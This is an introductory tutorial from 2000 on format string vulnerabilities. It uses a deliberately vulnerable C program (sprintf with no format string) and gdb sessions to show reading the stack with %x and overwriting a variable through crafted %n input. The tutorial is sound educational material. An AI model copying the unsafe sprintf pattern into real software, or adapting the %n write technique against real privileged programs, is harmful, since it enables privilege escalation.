Format String Attacks:
101
James Bowman
October 17, 2000
Format string attacks, or formats bugs, have been theorized about for
many years but they only began to appear around the midpoint of this year.
It appears that format bugs are going to be just as common as the buffer
overflow bugs have been. It started out as a trickle of reports of format
bugs. As people started examining the source code of their programs, the
trickle opened like a faucet. The big reports included the "wu-ftpd site
exec" bug in July, the "Qpopper POP3 server format bug" in May, the "rpc.statd
format bug" in August, and the Unix "locale format bug" in September. Apparently,
this is the point that the national media got a hold of the story.
For non-programmers, like myself, it is often helpful to work through
an example of something before we can permanently commit it to memory.
That is what we are going to do with this paper. We will have a brief description
of what format bugs are and then work through a small example program showing
the basics of how they work.
What are they?
Format bugs occur when a program receives unexpected user input. This
is not just any old unexpected input. These inputs are strings specifically
crafted to cause a privileged (suid) Unix program to allow privilege escalation
by a normal user. The format bugs can trick the program into allowing arbitrary
data to be written to the stack. When we can make the privileged program
write arbitrary data to the stack, we "own" the program and we "own" the
computer. There has been talk on the Bugtraq mailing lists about the possibility
of format string attacks on Microsoft systems but I am not aware of any
examples of this. Currently these bugs only affect Unix and Linux systems.
What causes them?
Format string attacks are caused by the same things that cause buffer
overflows: lazy or careless programmers. The programmer intends to write
something like this:
sprintf(buf, "%s", str);
But instead he gets lazy and types:
sprintf(buf, str);
He compiles his code and tests it. If it works, why give it a second thought.
If that weren’t the right way to do it, he would get an error from the
compiler, wouldn’t he? Wrong! What your friendly programmer has just done
is given out the keys to the kingdom. When you run his code on your web
server, file server, mail server, firewall, etc., his application is just
waiting for someone to come along and give the "open sesame" command. Because
our programmer has left out the format string ("%s"), sprintf looks at
the string (str) as the format string. This is what will allow the attacker
to compromise the program.
How do they work?
We need a little background information before we start with an example.
The %x conversion specifier tells the sprintf function to output the corresponding
variable in hex format. If there is not a corresponding variable, like
above when we make a programming error using the sprintf function, sprintf
retrieves a value off the stack. This is not good because we can read values
we’re not supposed to off the stack. When the %n format is encountered
in the format string, the number of characters output before the %n field
was encountered is stored at the address passed in the next argument. This
is an important point. Since we have an error in our code and the program
was not expecting to receive format strings as input, there is no next
argument. So instead, sprintf writes the value to the stack. This is bad,
because an attacker can craft an input string to cause our program to do
something it’s not supposed to do. Let’s look at a simple example of this.
An example:
The following code snippet is our test program. The code uses two buffers
(inbuf and outbuf). We included a target variable, target, just so we can
attack it. The code reads standard input, copies inbuf to outbuf using
sprintf (with no format string), and prints outbuf to the standard output.
[bowmanj@stinkpad Format]$ cat testprog.c
#include <stdio.h>
main(int argc, char **argv)
{
char inbuf[100];
char outbuf[100];
int target=1;
memset(inbuf, '\0', 100);
memset(outbuf, '\0', 100);
read(0, inbuf, 100);
sprintf(outbuf, inbuf); // This is the mistake
printf("%s", outbuf);
}
The line beginning with the sprintf statement is the hole in our program.
The correct way to write it would be:
sprintf(outbuf, "%s", inbuf);
First, we need to compile the program:
gcc –g –o testprog testprog.c
Now we need to run it in the debugger and give it the string "hello" as
the input:
[bowmanj@stinkpad Format]$ gdb testprog
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
(gdb) break printf
Breakpoint 1 at 0x8048378
(gdb) run
Starting program: /home/bowmanj/Format/testprog
hello
Breakpoint 1, main (argc=1, argv=0xbffffb74) at testprog.c:16
16 printf("%s", outbuf);
(gdb) print inbuf
$1 = "hello\n", '\000' <repeats 93 times>
(gdb) print &target
$2 = (int *) 0xbffffa5c
(gdb) print &outbuf
$3 = (char (*)[100]) 0xbffffa60
(gdb) print &inbuf
$4 = (char (*)[100]) 0xbffffac4
(gdb)
We give the program the string "hello" and then print the contents of inbuf
to verify it’s there. The last three debugger commands print where the
variables target, inbuf, and outbuf are in memory. We can now see how the
variables are situated on the stack.
Variable name
|
Memory location
|
target
|
0xbffffa5c
|
outbuf
|
0xbffffa60
|
inbuf
|
0xbffffac4
|
We’re going to see how we can use the %x format to view any value on
the stack. As we discussed above, this string should print out the argument
following it as a hex number. In our case there is no argument following
it because our string is being interpreted as a format. Let’s see what
happens.
(gdb) run
Starting program: /home/bowmanj/Format/testprog
%x %x %x
1 2031 203133
Program exited with code 016.
(gdb)
It may not be clear from the example what we’re looking at so I’ll tell
you. Our program has interpreted the "%x %x %x" as a format and printed
three values off the stack The "1" is the value of our target variable.
So now, we know we can read off the stack. Now we want to write to the
stack.
Our goal is to show that we can control the value of the target variable
by passing the program an unexpected string with embedded format characters
in it. This is a very simple example but it will illustrate our point.
First we want to get the address of the target variable into outbuf because
we will need to use it to control where sprintf will write the value returned
from the %n format character. We want to get it into the outbuf buffer
since it is adjacent to the target variable. We’ll use the printf command
to place the address of target into a text file in hex format. This will
make it easier to get the value into our program.
[bowmanj@stinkpad Format]$ printf "\x5c\xfa\xff\xbf" > infile
Now we want to run our test program and see that we have placed the address
of the target variable into outbuf properly using the file, infile, as
our input.
(gdb) set args < infile
(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/bowmanj/Format/testprog < infile
Breakpoint 1, main (argc=1, argv=0xbffffb74) at testprog.c:16
16 printf("%s", outbuf);
(gdb) x/60x &target
0xbffffa5c: 0x00000001 0xbffffa5c 0x00000000 0x00000000
0xbffffa6c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffa7c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffa8c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffa9c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffaac: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffabc: 0x00000000 0x00000000 0xbffffa5c 0x00000000
0xbffffacc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffadc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffaec: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffafc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb0c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb1c: 0x00000000 0x00000000 0x00000000 0xbffffb48
0xbffffb2c: 0x400339cb 0x00000001 0xbffffb74 0xbffffb7c
0xbffffb3c: 0x40013868 0x00000001 0x080483c0 0x00000000
As we can see now we have the address of the target variable (0xbffffa5c)
stored at the beginning of the outbuf buffer (0xbffffa60). Now is where
the fun begins. Now we will use the %n format string we discussed earlier
to our advantage. This is the format string that we will be using to change
the value of the target variable. Our task is to control where it writes.
We will now add a %x and a %n to our input file. This will cause us
to skip over the location of the target variable on the stack and use the
next value off the stack. This next value will be the first four bytes
of outbuf. Recall that we loaded outbuf with the address of the target
variable so this is where the value will be written.
[bowmanj@stinkpad Format]$ printf "\x5c\xfa\xff\xbf%%x%%n" > infile
Lets test it out:
[bowmanj@stinkpad Format]$ gdb testprog
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
(gdb) break 16
Breakpoint 1 at 0x80484c1: file testprog.c, line 16.
(gdb) set args < infile
(gdb) run
Starting program: /home/bowmanj/Format/testprog < infile
Breakpoint 1, main (argc=1, argv=0xbffffb74) at testprog.c:16
16 printf("%s", outbuf);
(gdb) print target
$1 = 5
(gdb)
We changed the value of target from 1 to 5. We can change it to other positive
numbers by adding precision formats before the %x and causing it to be
longer. This will change the value %n returns since it keeps a count of
the number of characters output.
[bowmanj@stinkpad Format]$ printf "\x5c\xfa\xff\xbf%%.10x%%n" > infile
Lets test it again:
(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/bowmanj/Format/testprog < infile
Breakpoint 1, main (argc=1, argv=0xbffffb74) at testprog.c:16
16 printf("%s", outbuf);
(gdb) print target
$2 = 14
(gdb)
Therefore, we have shown that we can read arbitrary values off the stack
and we can control the values of variables on the stack. We can choose
where we write by controlling the address we load into the buffer. We can
control what we write by using the precision formats to adjust the count
that %n returns. The next logical step would be to load shell code into
memory and have our program execute it but that is beyond the scope of
this paper.
There are a couple of great tutorials out there by Tim Newsham and Pascal
Bouchareine that explain format bugs in greater detail as well as inserting
shell code. If you are interested in format bugs, I would suggest you read
their papers and work through their examples.
References:
1. Arce, Ivan. "UNIX locale format string vulnerability" September 4,
2000.
URL: http://www.securityfocus.com/archive/1/80154
(October 17, 2000).
2. Bouchareine, Pascal. "More info on format bugs."
URL: http://julianor.tripod.com/kalou-formats.txt
(October 19, 2000)
3. Newsham, Tim. "Format String Attacks." September 2000.
URL: http://www.gaurdent.com/docs/FormatString.PDF
(October 17, 2000).
4. Seifried, Kurt. "Format Strings." September 26, 2000.
URL: http://www.securityportal.com/articles/formatstrings20000926.printerfriendly.html
(October 17, 2000).
5. Seifried, Kurt. "Format Strings: An Interview with Chris Evans."
October 11, 2000.
URL: http://securityportal.com/closet/closet20001011.printerfriendly.html
(October 17, 2000).
6. Shankland, Stephen. "Unix, Linux computers vulnerable to damaging
new attacks". September 7, 2000.
URL: http://news.cnet.com/news/0-1003-202-2719802.html
(October 18, 2000). |